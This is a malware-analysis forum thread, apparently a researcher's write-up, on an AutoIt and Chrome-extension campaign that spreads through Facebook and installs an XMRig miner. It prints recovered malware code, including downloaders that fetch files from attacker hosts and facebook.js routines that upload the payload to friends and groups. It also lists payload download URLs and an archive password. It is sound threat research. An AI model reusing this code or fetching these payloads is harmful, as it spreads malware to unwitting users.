A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #32869  by Xylitol
 Sun Apr 28, 2019 2:23 pm
Saw it yesterday spreading on facebook groups with random name and packed into .bz archives.

Image

I got 2 samples from that (they are in attachment):
8a9176fcd89930b93756d331186c6f9559bc673f2d168730c7e18f07882ed478 - 985.0 KB
8cb158ed001eded4d7a82847cb669b68da2fac74357aa97b8609d37f78a770ff - 989.0 KB

It's a compiled AutoIt script, it looks like it's interacting with chrome.exe (shuts it down, reopens it), but I can not exactly replicate the behavior, it seem to have few bugs. :|
The script is obfuscated also, it does not really help.

Files have a bit of network activity:
8a9176fcd89930b93756d331186c6f9559bc673f2d168730c7e18f07882ed478
Code: Select all
HEAD /app/login.php HTTP/1.1
User-Agent: Unzip
Window: C:\
ScriptName: play_12907320.mp4.com.exe
OS: WIN_XP
CPU: X64
Installed: Yes
Accept: */*
Host: fusu.icu
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sun, 28 Apr 2019 00:12:03 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Set-Cookie: __cfduid=dd82fe00871874ea7410c9eac913fd5d31556410323; expires=Mon, 27-Apr-20 00:12:03 GMT; path=/; domain=.fusu.icu; HttpOnly
Vary: Accept-Encoding
unzip : http://fusu.icu/app/7za.exe?id=3243
zip : http://fusu.icu/app/files.7z?id=3775
Server: cloudflare
CF-RAY: 4ce4d28c6c3da8db-CDG
8cb158ed001eded4d7a82847cb669b68da2fac74357aa97b8609d37f78a770ff:
Code: Select all
HEAD /app/login.php HTTP/1.1
User-Agent: Unzip
Window: Monitoring - API Monitor v2 32-bit (Administrator)
ScriptName: play_67487566.mp4.com.exe
OS: WIN_XP
CPU: X64
Installed: No
Accept: */*
Host: keke.icu
Connection: Keep-Alive

HTTP/1.1 200 OK
Date: Sun, 28 Apr 2019 00:53:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Set-Cookie: __cfduid=d44b26fd3c0765f3f834515909abca53f1556412782; expires=Mon, 27-Apr-20 00:53:02 GMT; path=/; domain=.keke.icu; HttpOnly
Vary: Accept-Encoding
unzip : http://keke.icu/app/7za.exe?id=6986
zip : http://keke.icu/app/files.7z?id=8734
Server: cloudflare
CF-RAY: 4ce50e947c00b75f-CDG
Looking closer on keke.icu i found it host few landings, including:
> HTXP: //keke.icu/download.php
who leak a path: Notice: Undefined variable: id in /var/www/letask.me/site/download.php" and lead also on malware download.

Image

So i end up with 3 domains:
- fusu.icu
- keke.icu
- letask.me

A kind of url shortener service, screenshot of main page:
Image

About the file from the landing page, it's retrieved from amazon cloud.
Code: Select all
a.href = "https://s3-us-west-2.amazonaws.com/dataval/FBVideo.exe";
37f0c2bb29eaa07cb5c8649871062afe3c261caaf76c7b52d49b04a97a7262e8 - 963.5 KB - VxVault (pulled today)

This one is old from 1 year, it's also in AutoIt, this time the code isn't obfuscated.
Appear to be a downloader for a miner:
Code: Select all
Func getconfig()
	$xhr = ObjCreate("winhttp.winhttprequest.5.1")
	$xhr.open("GET", "https://app.uye.io/miner/config.php", False)
	$xhr.setrequestheader("User-Agent", "Miner")
	$xhr.send()
	$return = $xhr.responsetext
	If $return = "denied" Then Exit
	createappfolder()
	$data = _stringexplode($return, "#", 0)
	For $file In $data
		downloadfile($file)
	Next
	copyself()
EndFunc
So i did few search on google about "app.uye.io" and i found that:
0bbe48aca7dfb0bb2d95e6f5e4c16562c674087552b5a16f3c8af4eb25aa6f12 - Detect.exe - 5.0 KB !
This time we have C#:
Code: Select all
internal sealed class Detect
{
    // Methods
    [STAThread]
    public static void Main()
    {
        string location = Assembly.GetExecutingAssembly().Location;
        string str2 = "denied";
        try
        {
            using (WebClient client = new WebClient())
            {
                client.Headers[HttpRequestHeader.UserAgent] = "Miner";
                str2 = client.DownloadString("https://app.uye.io/miner/boxlog.php?path=" + location);
            }
        }
        catch (Exception exception1)
        {
            ProjectData.SetProjectError(exception1);
            Exception exception = exception1;
            ProjectData.ClearProjectError();
        }
    }
}
Very similar code, maybe a test, no idea.

Fews older AutoIt samples that contact app.uye.io (also found with google):
Video.92894831.mp4.exe - 5e455b9ee3b744c6fa036a2dca24573145a90524ab7b63ebc264fe133d2ff675 - 950.5 KB
Video.50086893.mp4.exe - 8251159756f1f33d65b3730e004b389c7778a299cbcfed86992816d7118c55d1 - 954.5 KB
Video.64931686.mp4.exe - fbad55d6119236b4cc136b67eff538afaee6c522f6bc1cb6416eb29d7381ae6c - 998.0 KB
Video.86693317.mp4.exe - c8ac7f28b6aa16368bd07ab521c648aeecddaf98fe1a0a148ae9a7162c2c0075 - 950.5 KB

CyRadar guys seen it in december 2017, but spreading in messenger: https://translate.google.fr/translate?s ... 7881941%2F
About newest samples, check this write-up by VSM: https://translate.google.fr/translate?s ... &sandbox=1
Attachments
infected
(990.92 KiB) Downloaded 26 times
 #32871  by Xylitol
 Sun Apr 28, 2019 7:41 pm
Another.
8b68940459c9d22ee049e77c8ed5db77ef799ab3dedd0e7b6f75e93c49e8eed1 - 992.0 KB
AnyRun have a good one about it: https://any.run/report/365167731ed69d11 ... b43cee2799

Calling:
- susu.icu
- luru.icu
Same design of url shortener service
Image

Miner files (XMRig):
>htxp://susu.icu/app/7za.exe?id=8308 77613cca716edf68b9d5bab951463ed7fade5bc0ec465b36190a76299c50f117
>htxp://susu.icu/app/files.7z?id=4353 5321f7b102b93e3434ff2643c9093d8f1b31a0f4cf06f79490cb8f950410fa15 (e files.7z -aoa -p KEQZmgbrmDnTpa2b4DHVMX)

config.json:
Code: Select all
        {
            "url": "pool.letask.me:3333",
            "user": "82oiGPdPx9V3ReMPJsMBFp4gTZUdq8VUr7BZuoKQTQ8d5XpCwmXSVeBNvNWfoPpvgqNiBxv1Q1ZcWA51cS9z6z9mGjugtZk",
            "pass": "x",
            "keepalive": true,
            "nicehash": false,
            "variant": -1,
            "tls": false,
            "tls-fingerprint": null
        }
background.js:
Code: Select all
var zqfgy = {};
var odhslk = function(){
	var vhwfg = "http://luru.icu/config";
	fetch(vhwfg).then(function(response){
		return response.json();
	}).then(function(data){
		zqfgy = data;
		if(data.login == true){
			zqfgy.app = chrome.app.getDetails();
			zqdtvl();
		}else{
			hzszll();
		}
	});
}
Calling luru.icu/config:
Code: Select all
{
    "domain": "luru.icu",
    "homepage": "http://luru.icu",
    "url": "http://luru.icu/config",
    "check": "http://luru.icu/check",
    "shorten": "http://luru.icu/shorten",
    "status": true,
    "hash": "b1ccb147e149f3dfea606a15ba082060",
    "csrf": "3ab635e1686a8648246fe33928fef42e",
    "token": "YjFjY2IxNDdlMTQ5ZjNkZmVhNjA2YTE1YmEwODIwNjA=",
    "socket": "ws://luru.icu:8080",
    "ssl": false,
    "verified": true,
    "login": false
}
Related to the facebook spreading, it drop these files:
>htxp://luru.icu/bgxvrjfk ca68a49e006012ba9542ad064c9400ad8214f8df39e3f89b2facaabd615760b2
>htxp://luru.icu/js/facebook.js?1555768638150 16fb1761df19aa27b12087b46e8093225cd48f45ab85699154f50b8f3df3a9f8
>htxp://luru.icu/js/filters.php 7a6aaedf03fadcf2c46dabd2254b9a1cba08124644e8af4d9f45a82b6d397757

A sample of code from facebook.js:
Code: Select all
    params["filter[0]"] = "group";
    params["options[0]"] = "friends_only";
    params["options[1]"] = "nm";
    params["token"] = "v7";
    params["context"] = "mentions";
---
  var oReq = new XMLHttpRequest();
  oReq.open("GET", "https://letask.me/ajax/7z.php?ext=me", true);
  oReq.responseType = "arraybuffer";
---
facebook.uploadGroup = function(vars){
  var group = vars.group;
  var message = "Wow video ⬇🎞💖💋🔞👙😍🎞⬇";
  var getParams = {
    av: facebook.profile_id,
    album_id:"",
    asset3d_id:"",
    asked_fun_fact_prompt_data:"",
    attachment:"",
---
facebook.uploadFile = function(vars){
  var fd = new FormData();
  fd.append("upload_1025", vars.blob, "video_"+rand(11111,99999)+".bz");

How to get fresh samples ?
Code: Select all
htXp://letask.me/ajax/7z.php?ext=me
htXp://fusu.icu/ajax/7z.php?ext=me
htXp://keke.icu/ajax/7z.php?ext=me
htXp://susu.icu/ajax/7z.php?ext=me
htXp://luru.icu/ajax/7z.php?ext=me
etc...

Currently distributing 7b762687c311c32fceb61a21a710c009da8fc96ecfc06a350229d74be03d86c3 - 991.5 KB - qoqo.icu

Previously:
1c4104ca158e5e0bb8b54fa73d42bac1529c599d989eee6e0b1e6d40fa56031c - 986.0 KB - qoqo.icu
a83ec3fdd4482a42478f15207310c7980333e9b011f6f0cdfdf4b0f488a599a3 - 986.0 KB - qoqo.icu
4e5577e4b3c89c78c406e9c1d78928a4ddeb0384510654c0f4eb9a10d7b05af5 - 984.5 KB - qoqo.icu
Attachments
infected
(1.58 MiB) Downloaded 21 times
 #32877  by Xylitol
 Tue Apr 30, 2019 3:43 am
thx, I edited the thread title accordingly to Trendmicro detection.
also here is another curiosity:
dene.exe - 574ee5f6f38fe5b63eeb0d9bd8a7934027abf2a7b7000f79fba70e4526d94f17 - 951.0 KB
Code: Select all
Func download()
	Local $hdownload = InetGet("http://letask.me/test.php", "sa.exe", $inet_forcereload, $inet_downloadbackground)
	Do
		Sleep(250)
	Until InetGetInfo($hdownload, $inet_downloadcomplete)
	Local $ibytessize = InetGetInfo($hdownload, $inet_downloadread)
	Local $ifilesize = FileGetSize("sa.exe")
	InetClose($hdownload)
	MsgBox($mb_systemmodal, "", "The total download size: " & $ibytessize & @CRLF & "The total filesize: " & $ifilesize)
EndFunc
It download a file from test.php and save it as 'sa.exe',
Not available as of now, according to tencent habbo the file downloaded was 366.59 Kb, not their usual sizes of 9xx Kb.

About TrendMicro paper, as 'video' landing i've saw:
htXp://letask.me/youtube.php and htXp://letask.me/blob.php

And another sample fresh of today:
ff8655a156f9a4080430373a158bc25c0400e3dbad66a74a66efe6f740440187 - 998.5 KB - qoqo.icu

Funny they added a token to avoid people downloading directly from the source on facebook.js:
Code: Select all
facebook.getFile = function(vars){
  var oReq = new XMLHttpRequest();
  oReq.open("GET", uri("/ajax/7z.php?ext=me&hash="+config.token), true);
  oReq.responseType = "arraybuffer";
  oReq.onreadystatechange = function() {
      if(this.readyState != 4) return;
      var arrayBufferView = new Uint8Array( this.response );
      vars.blob = new Blob( [ arrayBufferView ], { type: "application/octet-stream" } );
      if(vars.friends.length > 0){
        facebook.uploadFile(vars);
      }
      if(vars.groups.length > 0){
        for (var i = 0; i < vars.groups.length; i++) {
          vars.group = vars.groups[i];
          facebook.uploadGroup(vars);
        }
      }
  };
  oReq.send();
}
And now they seem to target also twitter.
>htxp://qoqo.icu/js/facebook.js?1556629694498 a424c142c32d8ec4d3b74aaca1c9818f1298592d150f4b1ef8c144199b1246ce
>htxp://qoqo.icu/js/twitter.js?1556629694499 6fe4d15f5996b5a9b2429d8d25e792cd91566effc73183dd00a192ebac5204c0

Image
Fiddler session in attach.
edit: Distribution map from Kaspersky stats: https://twitter.com/IdoNaor1/status/1123224566510379008